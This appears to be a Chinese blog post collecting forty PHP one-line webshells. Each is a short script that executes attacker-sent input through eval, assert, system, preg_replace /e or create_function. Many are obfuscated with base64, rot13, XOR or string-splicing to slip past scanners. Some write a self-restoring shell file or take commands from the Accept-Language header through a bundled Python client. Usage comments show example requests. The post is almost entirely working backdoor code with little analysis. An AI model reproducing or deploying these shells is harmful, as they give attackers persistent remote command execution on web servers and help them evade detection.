PHP一句话木马集合
目录
- 前言
-
- 1、eval.php
- 2、assert.php
- 3、min_lenth.php
- 4、get_get.php
- 5、get_post.php
- 6、post_post.php
- 7、request_ab.php
- 8、document-write.php
- 9、script.php
- 10、include.php
- 11、require.php
- 12、stripslashes.php
- 13、config.php
- 14、$_POST[cmd].php
- 15、hard_brute.php
- 16、no_assert.php
- 17、accept_language.php
- 18、apply_filters.php
- 19、create_function.php
- 20、invoke_cmd.php
- 21、array.php
- 22、array_flip.php
- 23、array_map.php
- 24、array_walk_base64.php
- 25、base64_assert.php
- 26、str_replace.php
- 27、preg_replace.php
- 28、preg_replace_post.php
- 29、preg_replace_post_base64.php
- 30、preg_rot13.php
- 31、preg_rot13_post.php
- 32、assert_item.php
- 33、lambda.php
- 34、urldecode.php
- 35、xor.php
- 36、usort.php
- 37、foreach.php
- 38、special-ope.php
- 39、never_kill.php
- 40、spe_encode.php
- 结语
前言
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合
在此记录下
1、eval.php
@eval($_POST['cmd'])?>
2、assert.php
assert($_POST[cmd]);?>
3、min_lenth.php
`$_GET[1]`;//
4、get_get.php
//?a=assert&b=phpinfo();
@$_GET[a](@$_GET[b]);
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
?>
5、get_post.php
//?2=system POST:1=whoami
//2=assert 1=phpinfo();
($_=@$_GET[2]).@$_($_POST[1])//?2=assert 1
?>
6、post_post.php
//a=assert&b=phpinfo();
//a=system&b=ipconfig
@$_POST['a'](@$_POST['b']);
//a=assert
?>
7、request_ab.php
//?a=system&b=dir
//?a=assert&b=phpinfo();
//?a=assert&b=eval($_POST['pass'])
//POST:
// a=assert&b=phpinfo();
// a=system&b=whoami
//GET:
// http://127.0.0.1/fuckdun/yjh_2.php?a=assert&b=phpinfo();
//phpinfo(); == fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29;
//生成 c.php
$_REQUEST['a']($_REQUEST['b']);
?>
8、document-write.php
$root=$_SERVER['DOCUMENT_ROOT'];
$shelladdr=$root.'/shell.php';
$shellcontent='';
file_put_contents($shelladdr,$shellcontent);
//http://127.0.0.1/write_shell.php?cmd=file_put_contents("a.txt","w");
//http://127.0.0.1/write_shell.php?cmd=fwrite(fopen("a.txt","w"),"aa");
//$a = @$_GET['cmd'];
//@eval($a);
?>
9、script.php
<script language="php">@eval($_POST['cmd']);</script>
10、include.php
$filename=$_GET['id'];
include($filename);
?>
11、require.php
if($_POST['token']=='xxoo'){
require'flag.png';//phpinfo();
}
12、stripslashes.php
$content=stripslashes($_POST[1]);
eval($content);
?>
13、config.php
${"func"}=substr(__FILE__,-10,-4);
${"config"}=@$_GET[config];
@$func($config);
14、$_POST[cmd].php
${"function"}=substr(__FILE__,-15,-4);
${"config"}=assert;
$config($function);
//$func = @$_POST[cmd];
//assert($function);
//assert($_POST[cmd]);
15、hard_brute.php
//"shell" md5: 2591c98b70119fe624898b1e424b5e91
//substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['hihack']);
//var_dump(substr(md5(@$_GET['x']),0)=='2591c98b70119fe624898b1e424b5e91');
//substr(md5(@$_GET['x']),0)=='2591c98b70119fe624898b1e424b5e91'&&system('whoami');
substr(md5(@$_GET['x']),28)=='5e91'&&@eval($_POST['md5']);
?>
16、no_assert.php
//${"function"}= substr(__FILE__, -14, -4);
$a=md5('ssss');
$b=substr($a,2,2)+37;
$s=$b+18;
$e=substr($a,-7,1);
$r=$s-1;
$t=$r+2;
$z=chr($b).chr($s).chr($s).$e.chr($r).chr($t);
$z($_GET['cmd']);
?>
17、accept_language.php
/*
Tamper Data 修改Accept-Language:whoami / ipconfig
import requests
URL = 'http://127.0.0.1/fuckdun/php-webshells-master/accept_language.php'
while True:
command=raw_input("~$ ")
head = {'Accept-Language':command}
try:
req = requests.get(URL,headers=head)
print req.content
except Exception as e: print e
*/
//echo passthru(@$_GET['a']);
//echo getenv("HTTP_ACCEPT_LANGUAGE");
echopassthru(getenv("HTTP_ACCEPT_LANGUAGE"));
?>
18、apply_filters.php
classParse_Args{
publicfunctionapply_filters($key){
assert($key);
}
}
//?xxoo=phpinfo();
@extract($_REQUEST);
$reflectionMethod=newParse_Args();
$reflectionMethod->apply_filters($xxoo);
?>
19、create_function.php
//http://127.0.0.1/create_function.php?c=1;}phpinfo();/*
$id=@$_GET['c'];
$res='echo '.$id.'is'.$a.";";
$cf=create_function('$a',$res);
/*
function anonymous($a){
echo 1;}phpinfo();/*.'is'.$a;
//$id.'is'.$a;
}
anonymous($a);
*/
?>
20、invoke_cmd.php
$s=newReflectionFunction("assert");
@$s->invoke($_POST["cmd"]);
?>
21、array.php
item['wind']='assert';
$array[]=$item;
$array[0]['wind']($_POST['jssj'])
?>
22、array_flip.php
$args=1;
$arr=array("n;}$_REQUEST[c];/*"=>"test");
$arr1=array_flip($arr);// array("test"=>"n;}$_REQUEST[c];/*");
//var_dump($arr1);die(); //array(1) { ["test"]=> string(15) "n;}phpinfo();/*" }
$arr2=$arr1[test];// n;}$_REQUEST[c];/*
//var_dump($arr2);die(); // string(15) "n;}phpinfo();/*"
create_function('$args',$arr2);// 1,n;}$_REQUEST[c];/
23、array_map.php
if($_GET[session]=='xxoo'){
@array_map($_GET['xx'],(array)base64_decode($_REQUEST['oo']));
exit();
}
//?session=xxoo&xx=assert
//post:oo=cGhwaW5mbygpOw==
?>
24、array_walk_base64.php
//http://127.0.0.1/fuckdun/yjh_10.php?_exit=cHJlZ19maWx0ZXI=
//POST: mcontent=ZXZhbCgkX1BPU1RbY10pOw==&c=phpinfo();
$ad='|';$ad.='.';$ad.='*|';$ad.='e';
$_clasc=base64_decode(@$_GET['_exit']);//base64_decode($_REQUEST['_exit']); ->preg_replace 或preg_filter
$arr=array(base64_decode(@$_POST['mcontent'])=>$ad,); //$arr = array('phpinfo()' => '|.*|e')
@array_walk($arr,$_clasc,''); //preg_replace('|.*|e',phpinfo(),'')
/*
//www=preg_replace&wtf=phpinfo();
$e = $_REQUEST['www'];
$arr = array(@$_POST['wtf'] => '|.*|e',);
@array_walk($arr, $e, '')
//http://127.0.0.1/fuckdun/yjh_12.php?_exit=cHJlZ19yZXBsYWNl==
//post: mcontent=ZXZhbCgkX1BPU1RbY10pOw==&c=phpinfo();
$Base = "base6"."4"."_decod"."e";
$_clasc = $Base(@$_REQUEST['_exit']);
$arr = array($Base(@$_POST['mcontent']) => '|.*|e',);
@array_walk($arr, $_clasc, '');
*/
?>
25、base64_assert.php
error_reporting(0);
set_time_limit(0);
$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");
$a(@${"_P"."O"."S"."T"}[xw]);
?>
26、str_replace.php
$gn="J3Nhb3Nhb";
$alq="ydidKiTisg";
$obk="IEBldimFsIC";
$lub=str_replace("q","","qsqtqrq_replqace");
$cqs="gkX1BPU1Rb";
$hox=$lub("v","","vbasev6v4_vdvevcovdve");
$trx=$lub("ci","","ciccircieciacitcie_cifciucinciccitiocin");
$ots=$trx('',$hox($lub("i","",$obk.$cqs.$gn.$alq)));$ots();
/*
$uf="snc3"; //pass is sqzr
$ka="IEBldmFbsK";
$pjt="CRfUE9TVF";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="F6ciddKTs=";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw)));
$mpy();
*/
/*
$mt="mFsKCleRfU";
$ojj="IEBleldle";
$hsa="E9TVFsnd2VuJ10p";
$fnx="Ow==";
$zk = str_replace("d","","sdtdrd_redpdldadcde");
$ef = $zk("z", "", "zbazsze64_zdzeczodze");
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn");
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx)));
$zvm();
*/
?>
27、preg_replace.php
@preg_replace("/[copyright]/e",$_POST['c'],"error");?>
28、preg_replace_post.php
//[@eval(base64_decode($_POST[z0])):smirk:
@$a=$_POST['x'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>
29、preg_replace_post_base64.php
//eval(base64_decode($_POST[z0]))
//POST: gbtv=a&z0=cGhwaW5mbygpOw== phpinfo();
//gbtv=@eval_r($_POST[1])
if(@$_POST['gbtv']){
$_="b"/**/."ase64_decode";
preg_replace("/^/e",$_("ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFt6MF0pKQ=="),0);
}
?>
30、preg_rot13.php
JFIF
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");
?>
31、preg_rot13_post.php
($b4dboy=$_POST['b4dboy'])&&@preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)','add');?>
32、assert_item.php
//?_=assert&__=eval($_POST['pass'])
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
${'_'.$_}['_'](${'_'.$_}['__']);?>
33、lambda.php
//function __lambda_func(){@eval($_POST['f']);}
$s="F9QivT1NUWyd";$v="QGivV2YivWwoJ";$j="mJ10pOw=iv=";
$re=str_replace("iv","","sivtr_ivrepivlaivce");
$ba=$re("nf","","bnfanfse6nf4_nfdecnfode");
$fun=$re("vf","","cvfreavfte_fvfunctvfion");
$vi=$fun("",$ba($re("iv","",$v.$s.$j)));$vi();?>
34、urldecode.php
error_reporting(0);set_time_limit(0);
$GuTou=@$_POST["gutou"];
if($GuTou){
$GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);
$cc="";for($i=0;$i<strlen($GuTou);$i+=2)
$cc.=urldecode("%".substr($GuTou,$i,2));
@eval($cc);
exit;
}
//Hex2phpinfo();gutou=706870696E666F28293B
//gutou=406576616C2028245F504F53545B2778275D293B&x=phpinfo();
//whoami:73797374656D2877686F616D69293B
/*
//http://127.0.0.1/222.php?cc=706870696E666F28293B 执行phpinfo()
//把phpinfo();转换成URL格式去掉%得706870696E666F28293B
//
//http://127.0.0.1/222.php?cc=406576616C2028245F504F53545B2778275D293B
//密码x
if(@$_REQUEST["cc"]){
$c=@$_REQUEST["cc"];
$c=str_replace(array("\n","\t","\r"),"",$c);
$buf="";for($i=0;$i
?>
35、xor.php
@$_++;
$__=("#"^"|");
$__.=("."^"~");
$__.=("/"^"`");
$__.=("|"^"/");
$__.=("{"^"/");
${$__}[!$_](${$__}[$_]);//$_POST[0]($_POST[1]);0=assert&1=phpinfo();
?>
//360
${("#"^"|").("#"^"|")}=("!"^"`").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");
${("#"^"|").("#"^"|")}(@("-"^"H").("]"^"+").("["^":").(","^"@").("}"^"U").("e"^"A").("("^"w").("j"^":").("i"^"&").("#"^"p").(">"^"j").("!"^"z").("T"^"g").("e"^"S").("_"^"o").("?"^"b").("]"^"t"));
?>
36、usort.php
//php version>=5.6 usort(...$_GET);//?1[]=1-1&1[]=eval($_GET[x])&2=assert&x=phpinfo();
usort($_GET,'asse'.'rt');//usort.php?1=1+1&2=eval($_GETT[x])&x=phpinfo();
?>
37、foreach.php
//str1
session_start();
define("Emmm","诡道");
foreach(array('_COOKIE','_POST','_GET')as$_request)
{
foreach($$_requestas$_key=>$_value)
{
$$_key= $_value;
}
}
@$userinfo['userinfo']=$username;
@$userinfo["password"]=$password;
@$_SESSION["userinfo"]=$userinfo;
$userinfo=$_SESSION["userinfo"];
eval('$title='.$str1.';');
?>
38、special-ope.php
//http://127.0.0.1/fuckdun/yjh_4_2.php?0=system&1=whoami
//http://127.0.0.1/fuckdun/yjh_4_2.php?0=assert&1=phpinfo();
$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;@$_[((++$__)+($__++))].=$_;
$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]);
$_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]);
$_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__];
$_=$
$_[$__+$__];$_[@-_]($_[@!+_]);
?>
39、never_kill.php
ignore_user_abort(true);
//error_reporting(0);
set_time_limit(0);
$k='$_POST["#"]';
$s=<<<EOF
{$k});?>
EOF;
while(true)
{
if(!file_exists("killme.php")){
file_put_contents("killme.php","$s");
}
ob_flush();
flush();
sleep(1);
ob_end_flush();
}
/*
');
}
?>
*/
40、spe_encode.php
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=assert&__=phpinfo();
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=assert&__=eval($_POST[1])
//http://127.0.0.1/fuckdun/yjh_4_done.php?_=system&__=whoami
$_="";
$_[+""]='';
@$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
@${'_'.$_}['_'](@${'_'.$_}['__']);?>
结语
记录下,后续学习